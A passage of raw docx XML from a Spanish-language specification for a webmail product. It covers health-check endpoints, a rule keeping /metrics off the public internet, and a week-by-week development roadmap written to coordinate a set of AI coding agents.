        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">¿El proceso responde?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restart del container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Readiness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/health/ready</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">¿DB, cache, storage accesibles?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Eliminación del LB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Startup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/health/startup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">¿Plugins cargados?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Retraso de liveness/readiness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/metrics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nunca debe exponerse a Internet pública — revela internals de la aplicación. Se protege mediante restricción de red en Nginx y acceso solo desde Prometheus en la misma red Docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[155]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="232"/>
    <w:bookmarkEnd w:id="233"/>
    <w:bookmarkEnd w:id="234"/>
    <w:bookmarkStart w:id="252" w:name="roadmap-y-notas-para-el-agent-swarm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. Roadmap y Notas para el Agent Swarm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este capítulo final proporciona la hoja de ruta temporal, la división de responsabilidades entre agentes y las reglas de oro que rigen todas las decisiones técnicas del proyecto. Su propósito es permitir que un conjunto de agentes de IA trabajen de forma coordinada sobre el codebase sin inconsistencias arquitectónicas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="238" w:name="roadmap"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.1 Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El desarrollo de Webmail 6.0 se estructura en tres fases principales, con una duración total estimada de 16 semanas. La Fase 1 construye el MVP funcional; la Fase 2 añade refinamiento de UX y características avanzadas; la Fase 3 introduce capacidades enterprise.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="235" w:name="fase-1-mvp-semanas-1-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.1.1 Fase 1: MVP (Semanas 1-7)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="945"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="2245"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="2600"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Semana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Foco</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tareas Específicas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entregable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Criterio de Aceptación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Setup inicial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Monorepo pnpm, Docker Compose (MongoDB, Redis, SeaweedFS, Nginx), TypeScript strict, ESLint, Prettier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Infraestructura levantada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose up</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">levanta todos los servicios healthy;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pnpm lint</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">pasa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backend core - Parte 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fastify setup (plugins, CORS, JWT, rate limiting, helmet), Mongoose schemas (User, Account, Email, Folder), Auth (registro/login, JWT, refresh tokens)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">API base funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoints</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/register</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/login</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/refresh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">responden correctamente; JWT valida requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backend core - Parte 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP Bridge (imapflow, sync headers, fetch body con cache Redis), SMTP Service (Nodemailer pooling), encriptación AES-256-GCM de credenciales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pipeline de correo completo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sync de INBOX descarga headers; envío de email vía SMTP funciona; credenciales encriptadas en MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compose y drafts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tiptap 2 con toolbar, auto-save cada 10s a MongoDB, adjuntos drag-drop a SeaweedFS, Reply/Forward con cita JWZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sistema de redacción completo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usuario puede redactar, auto-save funciona, adjuntar archivos, responder con cita</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Calendario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">tsdav auto-discovery, CRUD eventos CalDAV, FullCalendar (día/semana/mes), parseo de .ics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Calendario integrado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Eventos se crean/leen/actualizan vía CalDAV; invitaciones .ics se muestran en emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontend polish</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dark mode (Tailwind dark:), atajos de teclado (Gmail-style), threading JWZ, búsqueda MongoDB Atlas Search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UX refinada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dark mode toggle funciona; atajos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">g+i</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">c</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">r</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">operan; búsqueda full-text &lt; 500ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Integración y QA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Testing E2E con Playwright (flujos críticos), performance audit Lighthouse, bug fixes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Release candidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lighthouse &gt; 90 en performance; tests E2E pasan; 0 bugs críticos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="235"/>
    <w:bookmarkStart w:id="236" w:name="fase-2-polish-semanas-8-11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.1.2 Fase 2: Polish (Semanas 8-11)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="1397"/>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="2795"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Semana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Foco</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tareas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entregable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Búsqueda avanzada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Filtros por fecha, remitente, adjuntos, búsqueda salvada, sugerencias autocomplete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Búsqueda con faceting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contactos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CardDAV sync vía tsdav, importación/exportación vCard, foto de contacto, grupos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Libreta de direcciones integrada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Notificaciones push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WebSocket (Socket.IO) para notificaciones en tiempo real, Service Worker para notificaciones del sistema, badge de unread</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Push notifications funcionales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Importación/exportación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Importación de .mbox/.eml, exportación de threads, backup de cuenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Herramientas de migración</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="236"/>
    <w:bookmarkStart w:id="237" w:name="fase-3-enterprise-semanas-12-16"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.1.3 Fase 3: Enterprise (Semanas 12-16)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="1397"/>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="2795"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Semana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Foco</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
